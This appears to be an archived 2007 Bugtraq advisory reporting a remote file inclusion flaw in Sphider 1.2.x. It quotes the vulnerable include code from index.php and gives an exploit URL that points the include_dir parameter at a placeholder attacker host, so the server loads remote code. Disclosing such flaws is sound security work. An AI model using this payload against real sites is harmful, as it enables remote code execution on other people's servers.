Sphider Version 1.2.x (include_dir) file include

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Sphider Version 1.2.x (include_dir) file include
From: 1one1@xxxxxxxxxxxxxxxxx
Date: 28 Apr 2007 07:45:44 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

# Sphider Version 1.2.x (include_dir) remote file include
# script Vendor: http://cs.ioc.ee/~ando/sphider/
# Discovered by: IbnuSina
found on index.php
$include_dir = "./include";  <--- no patch here
$language_dir = "./languages";
include "$include_dir/index_header.inc";
include "$include_dir/conf.php";
include "$include_dir/connect.php";

exploitz : http://targe.lu/[sphiderpath]/index.php?include_dir=injekan.lu?

Prev by Date: [ GLSA 200704-22 ] BEAST: Denial of Service
Next by Date: Seir Anphin (file.php a[filepath]) Remote File Disclosure Vulnerability
Previous by thread: [ GLSA 200704-22 ] BEAST: Denial of Service
Next by thread: Re: Sphider Version 1.2.x (include_dir) file include
Index(es):
- Date
- Thread